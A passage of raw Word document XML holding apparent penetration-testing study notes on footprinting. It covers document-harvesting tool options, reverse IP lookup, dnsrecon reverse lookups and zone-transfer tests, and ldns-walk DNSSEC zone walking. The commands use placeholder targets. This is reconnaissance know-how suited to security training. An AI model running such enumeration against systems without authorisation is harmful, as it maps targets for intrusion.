              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>EXTENSION</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00560806">
              <w:t>filetype to dow</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:t xml:space="preserve">nload     </w:t>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:t>limit of results to search (default 200)</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-h</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>YES</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:t>work with documents in directory (use "yes" for local analysis)</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-n</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:t>limit of files to download</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-o</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DIR</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:t>working directory (location to save downloaded files)</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-f</w:t>
            </w:r>
            <w:r w:rsidR="00567ADF" w:rsidRPr="00567ADF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ADF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME.EXTENSION</w:t>
            </w:r>
            <w:r w:rsidR="00560806">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00560806" w:rsidRPr="00567ADF">
              <w:t>output file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00335E53" w14:paraId="414E1CB3" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4EEEB621" w14:textId="77777777" w:rsidR="00335E53" w:rsidRDefault="00335E53" w:rsidP="00FC5A3D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="36CDE6D5" w14:textId="77777777" w:rsidR="00335E53" w:rsidRDefault="00335E53" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="141D40DD" w14:textId="77777777" w:rsidR="00335E53" w:rsidRDefault="00335E53" w:rsidP="00FC5A3D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DF238A0" w14:textId="3EAA97BA" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="0049571F"/>
    <w:p w14:paraId="318B91B7" w14:textId="77777777" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31847BFF" w14:textId="41E3A132" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="003C1BA5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse DNS Lookup </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC4AFB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNSR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>econ</w:t>
      </w:r>
      <w:r w:rsidR="00247F23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | LDNS</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1054"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2390"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C1BA5" w14:paraId="18814828" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4295B942" w14:textId="57D83533" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>19.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="04F0E7BB" w14:textId="1DE4D4BE" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Reverse DNS Lookup</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="003C1BA5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(yougetsignal.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F185EA4" w14:textId="77777777" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D">
            <w:r w:rsidRPr="003C1BA5">
              <w:t>Here, we will perform reverse DNS lookup using you get signal’s Reverse IP Domain Check tool to find the other domains/sites that share the same web server as our target server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E8B0BA2" w14:textId="77777777" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D"/>
          <w:p w14:paraId="28F6A0BD" w14:textId="2E95138E" w:rsidR="003C1BA5" w:rsidRPr="000079AE" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D">
            <w:r>
              <w:t xml:space="preserve">Visit:  </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://www.yougetsignal.com</w:t>
            </w:r>
            <w:r>
              <w:t>, click ‘Reverse IP Domain Check’.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C1BA5" w14:paraId="0D41F49A" w14:textId="77777777" w:rsidTr="003C1BA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4445472F" w14:textId="6E864682" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>19.</w:t>
            </w:r>
            <w:r w:rsidR="004C3AEE">
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="30C8AB1E" w14:textId="143B8017" w:rsidR="003C1BA5" w:rsidRDefault="004C3AEE" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>dnsrecon</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="004C3AEE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(dnsrecon is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D50541A" w14:textId="47D5D58B" w:rsidR="003C1BA5" w:rsidRDefault="004C3AEE" w:rsidP="00FC5A3D">
            <w:r>
              <w:t xml:space="preserve">To use </w:t>
            </w:r>
            <w:r w:rsidR="00FC4AFB">
              <w:t>DNSR</w:t>
            </w:r>
            <w:r>
              <w:t>econ in Terminal, simply use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004C3AEE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dnsrecon</w:t>
            </w:r>
            <w:r w:rsidR="00FC4AFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FC4AFB" w:rsidRPr="002F77BC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-d </w:t>
            </w:r>
            <w:r w:rsidR="002F77BC" w:rsidRPr="002F77BC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>X.X.X.0</w:t>
            </w:r>
            <w:r w:rsidRPr="002F77BC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004C3AEE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-r </w:t>
            </w:r>
            <w:r w:rsidRPr="004C3AEE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>X.X.X.</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3AEE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="004C3AEE">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>X.X.X.</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>255</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">(This is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>searching</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> a range)</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:br/>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3">
              <w:tab/>
              <w:t>Specify the target domain</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-r</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3">
              <w:tab/>
              <w:t>IP range for reverse lookup</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C27EB3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002F77BC" w:rsidRPr="002F77BC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
              <w:t>Verbose mode</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BF1F5E">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002F77BC" w:rsidRPr="002F77BC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-n</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
              <w:t>Name server to use</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:br/>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002F77BC" w:rsidRPr="002F77BC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00BF1F5E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BF1F5E">
              <w:t xml:space="preserve">Standard </w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:t>enum</w:t>
            </w:r>
            <w:r w:rsidR="00BF1F5E">
              <w:t xml:space="preserve"> using AXFR</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002F77BC" w:rsidRPr="002F77BC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00D21B87">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidR="002F77BC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00D21B87">
              <w:t>Deeper enumeration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D597DF5" w14:textId="3D127DE5" w:rsidR="003277DF" w:rsidRPr="003C1BA5" w:rsidRDefault="003277DF" w:rsidP="00FC5A3D">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003277DF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-t axfr</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Tests all ns servers for a zone transfer</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C27EB3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-z</w:t>
            </w:r>
            <w:r w:rsidR="00247F23">
              <w:tab/>
              <w:t>DNSSEC Zone Walking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00247F23" w14:paraId="4C1D42E6" w14:textId="77777777" w:rsidTr="003C1BA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="784A4F66" w14:textId="3C2B12E1" w:rsidR="00247F23" w:rsidRDefault="00247F23" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>19.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="55D5003A" w14:textId="0C1F03EB" w:rsidR="00247F23" w:rsidRDefault="00247F23" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ldns-walk</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00247F23">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(ldns-walk is not installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67769ACB" w14:textId="52EADC58" w:rsidR="00247F23" w:rsidRDefault="00247F23" w:rsidP="00FC5A3D">
            <w:r>
              <w:t>ldns-walk can enumerate the DNSSEC zone and obtain results on the DNS record files.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>First, it can be simply installed by entering ldns-walk, Kali will then ask if you would like to install and simply enter ‘y’. Once it has been installed, it is used with:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ldns-walk</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">DNS.SER.VER.IP </w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>WEBSITENAME.DOMAIN</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:t>For example:</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ldns-walk </w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">8.8.8.8 </w:t>
            </w:r>
            <w:r w:rsidR="00C27EB3" w:rsidRPr="00C27EB3">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>iana.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C1BA5" w14:paraId="773A77CB" w14:textId="77777777" w:rsidTr="00FC5A3D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="32B9E3AD" w14:textId="77777777" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="20601FB8" w14:textId="77777777" w:rsidR="003C1BA5" w:rsidRDefault="003C1BA5" w:rsidP="00FC5A3D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
